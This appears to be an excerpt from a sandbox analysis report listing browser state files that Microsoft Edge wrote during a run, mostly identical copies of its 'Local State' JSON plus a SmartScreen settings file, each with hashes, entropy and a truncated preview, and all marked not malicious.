                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):44455
                                                                                                                                                                                  Entropy (8bit):6.089812546757156
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWVdi1zNtPMNkzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynDWkzItSmd6qE7lFoC
                                                                                                                                                                                  MD5:F4DA5AF7581C5B635DB57D524AF47AA1
                                                                                                                                                                                  SHA1:4AABA36D8D5CEBBFBBEA520795F77345198B27C0
                                                                                                                                                                                  SHA-256:BEDD9A435C9B7C41FBCF600962B47A5792484FF567ADF97DEA1489BC3F6EA0D1
                                                                                                                                                                                  SHA-512:F680E442771491E4C43D8CB0F3A8E732DC5B706A98B3AD9724801D2CA8DF9520CCCA73622B3F10A8B2360650FF8AD7B19204C9D6F9A18386C683DED79847D43A
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF39cae.TMP (copy)

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):44455
                                                                                                                                                                                  Entropy (8bit):6.089812546757156
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWVdi1zNtPMNkzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynDWkzItSmd6qE7lFoC
                                                                                                                                                                                  MD5:F4DA5AF7581C5B635DB57D524AF47AA1
                                                                                                                                                                                  SHA1:4AABA36D8D5CEBBFBBEA520795F77345198B27C0
                                                                                                                                                                                  SHA-256:BEDD9A435C9B7C41FBCF600962B47A5792484FF567ADF97DEA1489BC3F6EA0D1
                                                                                                                                                                                  SHA-512:F680E442771491E4C43D8CB0F3A8E732DC5B706A98B3AD9724801D2CA8DF9520CCCA73622B3F10A8B2360650FF8AD7B19204C9D6F9A18386C683DED79847D43A
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF3c351.TMP (copy)

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):44455
                                                                                                                                                                                  Entropy (8bit):6.089812546757156
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWVdi1zNtPMNkzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynDWkzItSmd6qE7lFoC
                                                                                                                                                                                  MD5:F4DA5AF7581C5B635DB57D524AF47AA1
                                                                                                                                                                                  SHA1:4AABA36D8D5CEBBFBBEA520795F77345198B27C0
                                                                                                                                                                                  SHA-256:BEDD9A435C9B7C41FBCF600962B47A5792484FF567ADF97DEA1489BC3F6EA0D1
                                                                                                                                                                                  SHA-512:F680E442771491E4C43D8CB0F3A8E732DC5B706A98B3AD9724801D2CA8DF9520CCCA73622B3F10A8B2360650FF8AD7B19204C9D6F9A18386C683DED79847D43A
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF3e4b4.TMP (copy)

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):44455
                                                                                                                                                                                  Entropy (8bit):6.089812546757156
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWVdi1zNtPMNkzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynDWkzItSmd6qE7lFoC
                                                                                                                                                                                  MD5:F4DA5AF7581C5B635DB57D524AF47AA1
                                                                                                                                                                                  SHA1:4AABA36D8D5CEBBFBBEA520795F77345198B27C0
                                                                                                                                                                                  SHA-256:BEDD9A435C9B7C41FBCF600962B47A5792484FF567ADF97DEA1489BC3F6EA0D1
                                                                                                                                                                                  SHA-512:F680E442771491E4C43D8CB0F3A8E732DC5B706A98B3AD9724801D2CA8DF9520CCCA73622B3F10A8B2360650FF8AD7B19204C9D6F9A18386C683DED79847D43A
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF3e689.TMP (copy)

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):44455
                                                                                                                                                                                  Entropy (8bit):6.089812546757156
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWVdi1zNtPMNkzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynDWkzItSmd6qE7lFoC
                                                                                                                                                                                  MD5:F4DA5AF7581C5B635DB57D524AF47AA1
                                                                                                                                                                                  SHA1:4AABA36D8D5CEBBFBBEA520795F77345198B27C0
                                                                                                                                                                                  SHA-256:BEDD9A435C9B7C41FBCF600962B47A5792484FF567ADF97DEA1489BC3F6EA0D1
                                                                                                                                                                                  SHA-512:F680E442771491E4C43D8CB0F3A8E732DC5B706A98B3AD9724801D2CA8DF9520CCCA73622B3F10A8B2360650FF8AD7B19204C9D6F9A18386C683DED79847D43A
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF41895.TMP (copy)

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):44455
                                                                                                                                                                                  Entropy (8bit):6.089812546757156
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWVdi1zNtPMNkzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynDWkzItSmd6qE7lFoC
                                                                                                                                                                                  MD5:F4DA5AF7581C5B635DB57D524AF47AA1
                                                                                                                                                                                  SHA1:4AABA36D8D5CEBBFBBEA520795F77345198B27C0
                                                                                                                                                                                  SHA-256:BEDD9A435C9B7C41FBCF600962B47A5792484FF567ADF97DEA1489BC3F6EA0D1
                                                                                                                                                                                  SHA-512:F680E442771491E4C43D8CB0F3A8E732DC5B706A98B3AD9724801D2CA8DF9520CCCA73622B3F10A8B2360650FF8AD7B19204C9D6F9A18386C683DED79847D43A
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF42392.TMP (copy)

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):44455
                                                                                                                                                                                  Entropy (8bit):6.089812546757156
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWVdi1zNtPMNkzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynDWkzItSmd6qE7lFoC
                                                                                                                                                                                  MD5:F4DA5AF7581C5B635DB57D524AF47AA1
                                                                                                                                                                                  SHA1:4AABA36D8D5CEBBFBBEA520795F77345198B27C0
                                                                                                                                                                                  SHA-256:BEDD9A435C9B7C41FBCF600962B47A5792484FF567ADF97DEA1489BC3F6EA0D1
                                                                                                                                                                                  SHA-512:F680E442771491E4C43D8CB0F3A8E732DC5B706A98B3AD9724801D2CA8DF9520CCCA73622B3F10A8B2360650FF8AD7B19204C9D6F9A18386C683DED79847D43A
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF4269f.TMP (copy)

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):44455
                                                                                                                                                                                  Entropy (8bit):6.089812546757156
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWVdi1zNtPMNkzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynDWkzItSmd6qE7lFoC
                                                                                                                                                                                  MD5:F4DA5AF7581C5B635DB57D524AF47AA1
                                                                                                                                                                                  SHA1:4AABA36D8D5CEBBFBBEA520795F77345198B27C0
                                                                                                                                                                                  SHA-256:BEDD9A435C9B7C41FBCF600962B47A5792484FF567ADF97DEA1489BC3F6EA0D1
                                                                                                                                                                                  SHA-512:F680E442771491E4C43D8CB0F3A8E732DC5B706A98B3AD9724801D2CA8DF9520CCCA73622B3F10A8B2360650FF8AD7B19204C9D6F9A18386C683DED79847D43A
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF44e0d.TMP (copy)

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):44455
                                                                                                                                                                                  Entropy (8bit):6.089812546757156
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWVdi1zNtPMNkzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynDWkzItSmd6qE7lFoC
                                                                                                                                                                                  MD5:F4DA5AF7581C5B635DB57D524AF47AA1
                                                                                                                                                                                  SHA1:4AABA36D8D5CEBBFBBEA520795F77345198B27C0
                                                                                                                                                                                  SHA-256:BEDD9A435C9B7C41FBCF600962B47A5792484FF567ADF97DEA1489BC3F6EA0D1
                                                                                                                                                                                  SHA-512:F680E442771491E4C43D8CB0F3A8E732DC5B706A98B3AD9724801D2CA8DF9520CCCA73622B3F10A8B2360650FF8AD7B19204C9D6F9A18386C683DED79847D43A
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF4ab11.TMP (copy)

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):44455
                                                                                                                                                                                  Entropy (8bit):6.089812546757156
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWVdi1zNtPMNkzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynDWkzItSmd6qE7lFoC
                                                                                                                                                                                  MD5:F4DA5AF7581C5B635DB57D524AF47AA1
                                                                                                                                                                                  SHA1:4AABA36D8D5CEBBFBBEA520795F77345198B27C0
                                                                                                                                                                                  SHA-256:BEDD9A435C9B7C41FBCF600962B47A5792484FF567ADF97DEA1489BC3F6EA0D1
                                                                                                                                                                                  SHA-512:F680E442771491E4C43D8CB0F3A8E732DC5B706A98B3AD9724801D2CA8DF9520CCCA73622B3F10A8B2360650FF8AD7B19204C9D6F9A18386C683DED79847D43A
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSettings

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):47
                                                                                                                                                                                  Entropy (8bit):4.3818353308528755
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:2jRo6jhM6ceYcUtS2djIn:5I2uxUt5Mn
                                                                                                                                                                                  MD5:48324111147DECC23AC222A361873FC5
                                                                                                                                                                                  SHA1:0DF8B2267ABBDBD11C422D23338262E3131A4223
                                                                                                                                                                                  SHA-256:D8D672F953E823063955BD9981532FC3453800C2E74C0CC3653D091088ABD3B3
                                                                                                                                                                                  SHA-512:E3B5DB7BA5E4E3DE3741F53D91B6B61D6EB9ECC8F4C07B6AE1C2293517F331B716114BAB41D7935888A266F7EBDA6FABA90023EFFEC850A929986053853F1E02
                                                                                                                                                                                  Malicious:false
